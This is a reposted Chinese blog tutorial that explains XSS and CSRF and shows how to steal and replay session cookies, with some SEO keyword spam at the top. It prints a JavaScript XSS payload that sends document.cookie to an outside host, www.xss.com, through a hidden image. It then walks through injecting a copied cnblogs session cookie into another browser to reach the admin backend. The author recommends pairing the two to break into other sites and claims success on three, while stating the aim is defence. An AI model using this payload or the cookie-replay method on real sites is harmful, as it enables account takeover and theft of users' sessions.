乌海建设局网站,php网站后台模板,做营销看的网站,优秀画册设计网站1.关于XSS#xff08;跨站脚本攻击#xff09;和CSRF#xff08;跨站请求伪造#xff09;的知识#xff0c;xss表示Cross Site Scripting(跨站脚本攻击)#xff0c;它与SQL注入攻击类似#xff0c;SQL注入攻击中以SQL语句作为用户输入#xff0c;从而达到查询/修改/删除…1.关于XSS跨站脚本攻击和CSRF跨站请求伪造的知识xss表示Cross Site Scripting(跨站脚本攻击)它与SQL注入攻击类似SQL注入攻击中以SQL语句作为用户输入从而达到查询/修改/删除数据的目的而在xss攻击中通过插入恶意脚本实现对用户游览器的控制CSRF全名是Cross-site request forgery是一种对网站的恶意利用CSRF比XSS更具危险性。其实XSS攻击就是网站输入框没有限制非法字符或者没有对脚本内容进行编码导致的   var img document.createElement(img); img.srchttp://www.xss.com?cookiedocument.cookie; img.style.displaynone; document.getElementsByTagName(body)[0].appendChild(img);   比如这段代码当我们没有对网站输入框进行非法字符的限制的话用户输入了这段脚本这样就会神不知鬼不觉的把当前用户的cookie发送给了我的恶意站点我的恶意站点通过获取get参数就拿到了用户的cookie。当然我们可以通过这个方法拿到用户各种各样的数据。     2.当然我今天说的主要不是这些而是通过你拿到的cookie植入到你的浏览器中然后就可以访问网站后台了下面我来为大家演示一遍如何通过已存在的Cookie进入博客园后台我用IE浏览器和Chrome浏览器来测试 首先我们通过IE浏览器拿到我们登入博客园后的Cookie通过IECookiesview插件可以查看到IE浏览器下所有的Cookie信息然后我们找到cnblogs.com站点下的Cookie然后复制下.CNBlogsCookie和key和value值如图所示    3.众所周知cookies属于隐私数据不同浏览器保存在不同地方。不可能共享的此时我们再次打开Chorme浏览器如图IE浏览器为登录状态而chorme浏览器为未登录状态     4.那么此时我们就将刚拷贝的IE浏览器下博客园的cookie数据植入到chrome浏览器中实现cookie欺骗登录到博客园后台在chrome浏览器中添加cookies扩展程序方便写入和删除cookie     5.然后打开cookies插件我们就找到cnblogs.com下的cookie默认没有登录的时候是没有.CNBlogsCookie这个cookie的 然后我们点击添加一个cookie将.CNBlogsCookie和key和value值写入进去再刷新网站页面成功进入博客园网站后台       6.如果将这个方法再结合到开始讲的XSS攻击的话获取到别人网站的cookie信息那么黑进别人网站的后台就很容易了我自己也试了三个网站都是可以成功进入的 当然我说这些不是为了让大家黑别人的网站只是只有弄懂了这些才能更好的防范保证自己开发的网站的安全 转载于:https://www.cnblogs.com/zhang0807/p/10275359.html